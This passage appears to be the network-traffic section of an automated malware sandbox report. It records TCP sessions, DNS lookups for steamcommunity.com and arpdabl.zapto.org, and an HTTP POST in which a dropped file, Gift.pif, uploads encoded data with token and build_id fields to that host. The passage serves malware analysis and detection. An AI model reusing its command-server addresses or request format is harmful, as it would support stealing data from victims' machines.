                                                                        Aug 5, 2024 18:56:43.655649900 CEST49744443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:43.655668020 CEST44349744188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:44.149229050 CEST44349743188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:44.149328947 CEST44349743188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:44.149420023 CEST49743443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:44.149420023 CEST49743443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:44.150546074 CEST49743443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:44.150562048 CEST44349743188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:44.328620911 CEST44349744188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:44.328736067 CEST49744443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:44.329508066 CEST49744443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:44.329535961 CEST44349744188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:44.331268072 CEST49744443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:44.331280947 CEST44349744188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:44.331382990 CEST49744443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:44.331401110 CEST44349744188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:44.703485966 CEST49745443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:44.703528881 CEST44349745188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:44.703604937 CEST49745443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:44.703831911 CEST49745443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:44.703844070 CEST44349745188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:45.148808002 CEST44349744188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:45.148869038 CEST44349744188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:45.148896933 CEST49744443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:45.148927927 CEST49744443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:45.149811983 CEST49744443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:45.149837017 CEST44349744188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:45.398824930 CEST44349745188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:45.398883104 CEST49745443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:45.399364948 CEST49745443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:45.399372101 CEST44349745188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:45.400974035 CEST49745443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:45.400978088 CEST44349745188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:45.401006937 CEST49745443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:45.401011944 CEST44349745188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:45.705627918 CEST49746443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:45.705656052 CEST44349746188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:45.705722094 CEST49746443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:45.705940008 CEST49746443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:45.705951929 CEST44349746188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:46.135731936 CEST44349745188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:46.135787010 CEST49745443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:46.135799885 CEST44349745188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:46.135833979 CEST44349745188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:46.135838985 CEST49745443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:46.135871887 CEST49745443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:46.143132925 CEST49745443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:46.143151045 CEST44349745188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:46.372724056 CEST44349746188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:46.372824907 CEST49746443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:46.373405933 CEST49746443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:46.373413086 CEST44349746188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:46.374993086 CEST49746443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:46.374998093 CEST44349746188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:46.375046968 CEST49746443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:46.375055075 CEST44349746188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:46.793608904 CEST49747443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:46.793673992 CEST44349747188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:46.793765068 CEST49747443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:46.793977976 CEST49747443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:46.793991089 CEST44349747188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:47.236643076 CEST44349746188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:47.236717939 CEST44349746188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:47.236845016 CEST49746443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:47.237742901 CEST49746443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:47.237762928 CEST44349746188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:47.466634989 CEST44349747188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:47.466732025 CEST49747443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:47.467178106 CEST49747443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:47.467191935 CEST44349747188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:47.468734026 CEST49747443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:47.468740940 CEST44349747188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:47.468769073 CEST49747443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:47.468776941 CEST44349747188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:47.824681997 CEST49748443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:47.824727058 CEST44349748188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:47.824819088 CEST49748443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:47.825072050 CEST49748443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:47.825082064 CEST44349748188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:48.217108965 CEST44349747188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:48.217235088 CEST44349747188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:48.217258930 CEST49747443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:48.217319965 CEST49747443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:48.218278885 CEST49747443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:48.218321085 CEST44349747188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:48.654922962 CEST44349748188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:48.655005932 CEST49748443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:48.655473948 CEST49748443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:48.655494928 CEST44349748188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:48.657234907 CEST49748443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:48.657247066 CEST44349748188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:48.657268047 CEST49748443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:48.657279015 CEST44349748188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:48.880496025 CEST49749443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:48.880559921 CEST44349749188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:48.880661011 CEST49749443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:48.880901098 CEST49749443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:48.880918026 CEST44349749188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:49.380557060 CEST44349748188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:49.380614042 CEST44349748188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:49.380712986 CEST49748443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:49.382103920 CEST49748443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:49.382124901 CEST44349748188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:49.549258947 CEST44349749188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:49.549343109 CEST49749443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:49.549793959 CEST49749443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:49.549810886 CEST44349749188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:49.552366972 CEST49749443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:49.552376032 CEST44349749188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:50.085031986 CEST44349749188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:50.085146904 CEST49749443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:50.085201979 CEST44349749188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:50.085239887 CEST44349749188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:50.085268021 CEST49749443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:50.085297108 CEST49749443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:50.086345911 CEST49749443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:50.086380959 CEST44349749188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:50.885107994 CEST49750443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:50.885224104 CEST44349750188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:50.885335922 CEST49750443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:50.885607958 CEST49750443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:50.885639906 CEST44349750188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:51.562750101 CEST44349750188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:51.563056946 CEST49750443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:51.563540936 CEST49750443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:51.563570976 CEST44349750188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:51.565283060 CEST49750443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:51.565295935 CEST44349750188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:52.246961117 CEST44349750188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:52.247061968 CEST49750443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:52.247106075 CEST44349750188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:52.247153997 CEST44349750188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:52.247164965 CEST49750443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:52.247212887 CEST49750443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:52.247320890 CEST49750443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:52.247354031 CEST44349750188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:52.248549938 CEST49751443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:52.248581886 CEST44349751188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:52.248662949 CEST49751443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:52.248837948 CEST49751443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:52.248850107 CEST44349751188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:52.926815033 CEST44349751188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:52.926886082 CEST49751443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:52.927344084 CEST49751443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:52.927349091 CEST44349751188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:52.928786993 CEST49751443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:52.928793907 CEST44349751188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:53.657011032 CEST44349751188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:53.657097101 CEST49751443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:53.657109022 CEST44349751188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:53.657152891 CEST49751443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:53.657202005 CEST44349751188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:53.657243967 CEST49751443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:53.657252073 CEST44349751188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:53.657284975 CEST49751443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:53.657284975 CEST49751443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:53.686314106 CEST4975280192.168.2.538.180.132.96
                                                                        Aug 5, 2024 18:56:53.691690922 CEST804975238.180.132.96192.168.2.5
                                                                        Aug 5, 2024 18:56:53.691829920 CEST4975280192.168.2.538.180.132.96
                                                                        Aug 5, 2024 18:56:53.691958904 CEST4975280192.168.2.538.180.132.96
                                                                        Aug 5, 2024 18:56:53.692044973 CEST4975280192.168.2.538.180.132.96
                                                                        Aug 5, 2024 18:56:53.704034090 CEST804975238.180.132.96192.168.2.5
                                                                        Aug 5, 2024 18:56:53.704088926 CEST4975280192.168.2.538.180.132.96
                                                                        Aug 5, 2024 18:56:53.704104900 CEST804975238.180.132.96192.168.2.5
                                                                        Aug 5, 2024 18:56:53.704159021 CEST4975280192.168.2.538.180.132.96
                                                                        Aug 5, 2024 18:56:53.704209089 CEST804975238.180.132.96192.168.2.5
                                                                        Aug 5, 2024 18:56:53.704258919 CEST4975280192.168.2.538.180.132.96
                                                                        Aug 5, 2024 18:56:53.704895020 CEST804975238.180.132.96192.168.2.5
                                                                        Aug 5, 2024 18:56:53.704942942 CEST4975280192.168.2.538.180.132.96
                                                                        Aug 5, 2024 18:56:53.705359936 CEST804975238.180.132.96192.168.2.5
                                                                        Aug 5, 2024 18:56:53.705426931 CEST4975280192.168.2.538.180.132.96
                                                                        Aug 5, 2024 18:56:53.705430031 CEST804975238.180.132.96192.168.2.5
                                                                        Aug 5, 2024 18:56:53.705477953 CEST804975238.180.132.96192.168.2.5
                                                                        Aug 5, 2024 18:56:53.705508947 CEST4975280192.168.2.538.180.132.96
                                                                        Aug 5, 2024 18:56:53.705529928 CEST4975280192.168.2.538.180.132.96
                                                                        Aug 5, 2024 18:56:53.705604076 CEST804975238.180.132.96192.168.2.5
                                                                        Aug 5, 2024 18:56:53.705631971 CEST804975238.180.132.96192.168.2.5
                                                                        Aug 5, 2024 18:56:53.705655098 CEST4975280192.168.2.538.180.132.96
                                                                        Aug 5, 2024 18:56:53.705677986 CEST4975280192.168.2.538.180.132.96
                                                                        Aug 5, 2024 18:56:53.709573030 CEST804975238.180.132.96192.168.2.5
                                                                        Aug 5, 2024 18:56:53.709600925 CEST804975238.180.132.96192.168.2.5
                                                                        Aug 5, 2024 18:56:53.709633112 CEST804975238.180.132.96192.168.2.5
                                                                        Aug 5, 2024 18:56:53.709634066 CEST4975280192.168.2.538.180.132.96
                                                                        Aug 5, 2024 18:56:53.709650993 CEST4975280192.168.2.538.180.132.96
                                                                        Aug 5, 2024 18:56:53.709695101 CEST4975280192.168.2.538.180.132.96
                                                                        Aug 5, 2024 18:56:53.709706068 CEST804975238.180.132.96192.168.2.5
                                                                        Aug 5, 2024 18:56:53.709733963 CEST804975238.180.132.96192.168.2.5
                                                                        Aug 5, 2024 18:56:53.709747076 CEST4975280192.168.2.538.180.132.96
                                                                        Aug 5, 2024 18:56:53.709777117 CEST4975280192.168.2.538.180.132.96
                                                                        Aug 5, 2024 18:56:53.709956884 CEST804975238.180.132.96192.168.2.5
                                                                        Aug 5, 2024 18:56:53.710006952 CEST4975280192.168.2.538.180.132.96
                                                                        Aug 5, 2024 18:56:53.710433006 CEST804975238.180.132.96192.168.2.5
                                                                        Aug 5, 2024 18:56:53.710483074 CEST4975280192.168.2.538.180.132.96
                                                                        Aug 5, 2024 18:56:53.756562948 CEST804975238.180.132.96192.168.2.5
                                                                        Aug 5, 2024 18:56:53.756675959 CEST4975280192.168.2.538.180.132.96
                                                                        Aug 5, 2024 18:56:53.804660082 CEST804975238.180.132.96192.168.2.5
                                                                        Aug 5, 2024 18:56:54.639024973 CEST804975238.180.132.96192.168.2.5
                                                                        Aug 5, 2024 18:56:54.639205933 CEST4975280192.168.2.538.180.132.96
                                                                        Aug 5, 2024 18:56:58.409111023 CEST4975280192.168.2.538.180.132.96

                                                                        UDP Packets

                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        Aug 5, 2024 18:55:00.994283915 CEST6300553192.168.2.51.1.1.1
                                                                        Aug 5, 2024 18:55:01.009685993 CEST53630051.1.1.1192.168.2.5
                                                                        Aug 5, 2024 18:55:48.996161938 CEST5848853192.168.2.51.1.1.1
                                                                        Aug 5, 2024 18:55:49.003500938 CEST53584881.1.1.1192.168.2.5
                                                                        Aug 5, 2024 18:56:53.672638893 CEST5876853192.168.2.51.1.1.1
                                                                        Aug 5, 2024 18:56:53.684981108 CEST53587681.1.1.1192.168.2.5

                                                                        DNS Queries

                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                        Aug 5, 2024 18:55:00.994283915 CEST192.168.2.51.1.1.10x225aStandard query (0)KLUpntqKswLWgWJpHbymfJYffqy.KLUpntqKswLWgWJpHbymfJYffqyA (IP address)IN (0x0001)false
                                                                        Aug 5, 2024 18:55:48.996161938 CEST192.168.2.51.1.1.10x36a8Standard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                                        Aug 5, 2024 18:56:53.672638893 CEST192.168.2.51.1.1.10x6302Standard query (0)arpdabl.zapto.orgA (IP address)IN (0x0001)false

                                                                        DNS Answers

                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                        Aug 5, 2024 18:55:01.009685993 CEST1.1.1.1192.168.2.50x225aName error (3)KLUpntqKswLWgWJpHbymfJYffqy.KLUpntqKswLWgWJpHbymfJYffqynonenoneA (IP address)IN (0x0001)false
                                                                        Aug 5, 2024 18:55:49.003500938 CEST1.1.1.1192.168.2.50x36a8No error (0)steamcommunity.com104.102.49.249A (IP address)IN (0x0001)false
                                                                        Aug 5, 2024 18:56:53.684981108 CEST1.1.1.1192.168.2.50x6302No error (0)arpdabl.zapto.org38.180.132.96A (IP address)IN (0x0001)false

                                                                        HTTP Request Dependency Graph

                                                                        • steamcommunity.com
                                                                        • 188.245.87.202
                                                                        • arpdabl.zapto.org

                                                                        HTTP Packets

                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        0192.168.2.54975238.180.132.9680748C:\Users\user\AppData\Local\Temp\366791\Gift.pif
                                                                        TimestampBytes transferredDirectionData
                                                                        Aug 5, 2024 18:56:53.691958904 CEST330OUTPOST / HTTP/1.1
                                                                        Content-Type: multipart/form-data; boundary=----CBKJJJDHDGDAAKECAKJD
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                        Host: arpdabl.zapto.org
                                                                        Content-Length: 50529
                                                                        Connection: Keep-Alive
                                                                        Cache-Control: no-cache
                                                                        Aug 5, 2024 18:56:53.692044973 CEST11124OUTData Raw: 2d 2d 2d 2d 2d 2d 43 42 4b 4a 4a 4a 44 48 44 47 44 41 41 4b 45 43 41 4b 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 37 31 37 36 34
                                                                        Data Ascii: ------CBKJJJDHDGDAAKECAKJDContent-Disposition: form-data; name="token"371764cf8efc1b40dfc15a6ff874b301------CBKJJJDHDGDAAKECAKJDContent-Disposition: form-data; name="build_id"dc0c9f3971cace826e9cb1916d9d3a66------CBKJJJDHDGDAAK
                                                                        Aug 5, 2024 18:56:53.704088926 CEST1236OUTData Raw: 2f 67 30 48 6b 32 42 4c 56 7a 45 64 42 61 44 58 78 70 67 78 78 7a 46 64 78 78 62 77 54 2b 6a 59 37 72 74 73 30 4a 2f 72 34 56 78 2f 75 42 30 70 72 72 61 73 36 4b 7a 75 50 73 33 4d 6e 76 6b 73 6c 2b 39 63 2b 47 65 6e 74 74 50 77 42 6b 71 71 50 79
                                                                        Data Ascii: /g0Hk2BLVzEdBaDXxpgxxzFdxxbwT+jY7rts0J/r4Vx/uB0prras6KzuPs3Mnvksl+9c+GenttPwBkqqPyaMino/gRbXVXo6weRGq6LJkc515U6t9CoDVj4RXlDCOlhBg2p/QJ46Fu9ZIPBhrrURa23XxpTWV6HB+pN4ryiGTy23SIPPJum0bsCgRYaHgk3f3l3gHZ/B6mvp2/UvEXQlq0LMPriJPuUE+uNg0/Fogk+6OMyBt6I
                                                                        Aug 5, 2024 18:56:53.704159021 CEST2472OUTData Raw: 2b 6f 41 4b 71 53 52 62 32 6d 4b 72 47 68 44 76 4e 2b 39 58 64 43 52 4a 68 78 31 63 78 47 74 39 58 70 71 4b 53 61 72 63 44 48 46 52 36 63 4c 62 61 68 51 51 69 70 46 6d 76 55 2b 6d 35 6f 62 72 61 53 63 72 46 36 5a 77 39 67 43 4f 51 42 37 6f 59 73
                                                                        Data Ascii: +oAKqSRb2mKrGhDvN+9XdCRJhx1cxGt9XpqKSarcDHFR6cLbahQQipFmvU+m5obraScrF6Zw9gCOQB7oYsImEm+hNINtCSmWGorZQt/TNOXKQ4Dp9FEQweW0Wh8lJNTnZ/tqrctWwLJoKUg2YidB+IpExLjGlBzSZvneYLGBVVrZ/o4PXp1d9rmzHTESi0wsVVhZiF9uS9amdd8tVh9Imy9QqjNh8vOjpJhfoeFjfp+nngSru5F
                                                                        Aug 5, 2024 18:56:53.704258919 CEST2472OUTData Raw: 62 79 38 39 46 4f 4c 68 42 59 6a 6f 53 2b 2b 70 65 69 68 33 4a 4f 6a 69 72 77 57 41 75 7a 37 4d 77 79 41 71 55 36 67 37 67 37 71 63 6e 4f 69 73 58 47 79 31 50 65 4d 75 4c 34 30 79 78 38 76 32 78 31 53 38 50 36 55 64 78 64 37 76 71 52 54 45 6d 69
                                                                        Data Ascii: by89FOLhBYjoS++peih3JOjirwWAuz7MwyAqU6g7g7qcnOisXGy1PeMuL40yx8v2x1S8P6Udxd7vqRTEmiBGIdpgAlVXo0dDhxGsPNz2dVuWwiDpbHvZ1MZaqh8+NVMG36sSJ9ba3kV01pBS7y1Qty989GrP5iROJb0zmKjKNqghvV2QxNDrmZY/mg+ya7TkIMqVvKIe0QXRE/qbsQT+34gUer2MLfaGnkZGW1yv+lXkkPFdiIY
                                                                        Aug 5, 2024 18:56:53.704942942 CEST2472OUTData Raw: 48 51 6a 77 73 48 4f 66 67 4c 4e 4c 76 57 49 57 72 44 6b 51 38 67 74 43 7a 49 66 2b 35 37 68 48 48 47 70 44 33 30 77 54 6d 41 56 69 47 57 62 72 6a 77 37 4e 48 6d 74 41 4d 46 68 53 2b 58 5a 43 72 48 34 6e 48 59 76 41 32 67 46 6c 79 50 49 63 73 49
                                                                        Data Ascii: HQjwsHOfgLNLvWIWrDkQ8gtCzIf+57hHHGpD30wTmAViGWbrjw7NHmtAMFhS+XZCrH4nHYvA2gFlyPIcsI4iVx7g/MzHXwXlQfiJe1h0d2DUYn3eaJTtH8ssGe7RWsnPZlu06xwDahI6yF6yir5J/BJa5vKVvfDzZWGvbYNtkq0XTDIJpRllsedmixBbHQkfZx060VPXrzpB41BbeYNJHD0PEttPg0grAbsxQO4MrDtNB3a6xSO
                                                                        Aug 5, 2024 18:56:53.705426931 CEST2472OUTData Raw: 51 64 75 38 69 4c 4f 32 6d 31 78 51 6f 68 68 62 6a 4e 6c 4d 50 54 42 78 73 76 2f 59 2f 46 72 48 74 71 31 2f 72 58 6b 54 6f 79 2f 36 65 48 47 78 35 66 77 52 48 65 43 39 32 37 74 66 67 4f 54 66 42 35 34 42 66 53 59 55 61 76 73 43 70 43 6b 33 6c 34
                                                                        Data Ascii: Qdu8iLO2m1xQohhbjNlMPTBxsv/Y/FrHtq1/rXkToy/6eHGx5fwRHeC927tfgOTfB54BfSYUavsCpCk3l4lUZUFXCqj4cU4Wb+5uU59S0JEXJ+T1xJvTdnwd7Ww1ceiAI7E1O7fh9Cs5J1bLNIshvVcnno/gWmu11qgORtcYhw/74nq3r8jWnPGi7SjRO+bw0xSZbc6rdLs1Xl5yZ5wX3gHP++Sp33/fkqXpBrtTDMgeSc9XOZe
                                                                        Aug 5, 2024 18:56:53.705508947 CEST2472OUTData Raw: 6e 6a 52 56 4b 4f 79 58 31 51 50 6c 56 53 4a 45 56 37 4a 78 34 59 51 55 5a 45 30 55 38 72 61 33 71 79 46 66 56 37 70 56 71 76 65 33 34 41 74 57 69 4f 72 65 4f 59 68 36 38 63 4f 2f 4b 4a 47 38 35 6e 49 74 64 53 39 68 61 69 54 2f 37 72 43 79 47 35
                                                                        Data Ascii: njRVKOyX1QPlVSJEV7Jx4YQUZE0U8ra3qyFfV7pVqve34AtWiOreOYh68cO/KJG85nItdS9haiT/7rCyG5Kj6ZsAifxd4nSpeOfCsS7+7N/xf3BtqSX19ZX3AJ7q9TV53fUtju6dV9BPyB01guw/2a6mpHuLORlJf5/ZJ/+5thUMyeZHUN7YFmuvFTq8E3qxp8otwAn1U09bYSr8RfZir94In4HmatAW2uf0SdRQyn7OL27xusa
                                                                        Aug 5, 2024 18:56:53.705529928 CEST2472OUTData Raw: 36 46 38 6b 50 78 47 35 73 6c 30 75 66 4b 64 57 35 48 2b 73 34 46 50 71 57 2f 48 72 46 72 51 33 6e 6e 74 61 2b 65 6a 69 57 33 63 4a 62 64 69 61 36 56 47 70 76 2f 53 2b 71 31 78 58 6e 4c 4c 48 65 55 68 69 53 33 5a 44 6e 39 71 4b 4b 41 42 51 56 33
                                                                        Data Ascii: 6F8kPxG5sl0ufKdW5H+s4FPqW/HrFrQ3nnta+ejiW3cJbdia6VGpv/S+q1xXnLLHeUhiS3ZDn9qKKABQV3SFAlwKJpGB6QJZkY5I2pvlRmx2kUWlZkJeSkiESMTJsoEzSJI20eebZ53nAhISXq65UCK7lEE8EyGL+sHoEyRObVeKOueGm2CS4OArqRp8Wx53LjGewoyjeiUzxEvEoHqwEFp8ZhWtiI2FzKXUlqgVma201yRIojq
                                                                        Aug 5, 2024 18:56:53.705655098 CEST2472OUTData Raw: 35 43 32 2f 5a 45 7a 39 7a 37 55 6d 35 4b 54 49 6c 7a 62 57 2b 6d 34 4b 71 33 69 36 6e 4d 4a 71 5a 41 69 47 56 4c 62 63 75 67 58 63 63 6d 2f 66 6d 62 74 71 68 39 54 33 32 57 4e 72 31 6f 47 68 30 39 6e 32 62 2b 41 31 31 74 64 4c 76 33 75 6f 33 62
                                                                        Data Ascii: 5C2/ZEz9z7Um5KTIlzbW+m4Kq3i6nMJqZAiGVLbcugXccm/fmbtqh9T32WNr1oGh09n2b+A11tdLv3uo3bte8eCjZ+8moi+cXqT7rD1S9fDpO7mJd64FRnUyBQr+2rzWSV6MvMBkrVXCK9Nh9aoR96GnhDCXLd12JZlVb8f60LM354WGamg2J/ifTTnRxjR4HJNZsb+25xcl+tnvvyvrw79/TugxmxkxGQyLf6DqNY1dEkxoalY
                                                                        Aug 5, 2024 18:56:53.705677986 CEST2472OUTData Raw: 63 2f 65 62 59 36 52 74 4e 57 34 72 4f 79 6e 37 5a 30 63 6f 6f 31 2f 42 62 75 6c 4d 72 78 48 4a 54 39 4b 30 54 76 4b 45 7a 71 39 71 4c 72 54 6d 65 7a 64 42 39 31 66 76 41 57 45 39 49 38 2b 73 42 2f 52 42 31 78 65 38 6e 31 76 6a 64 30 74 69 78 63
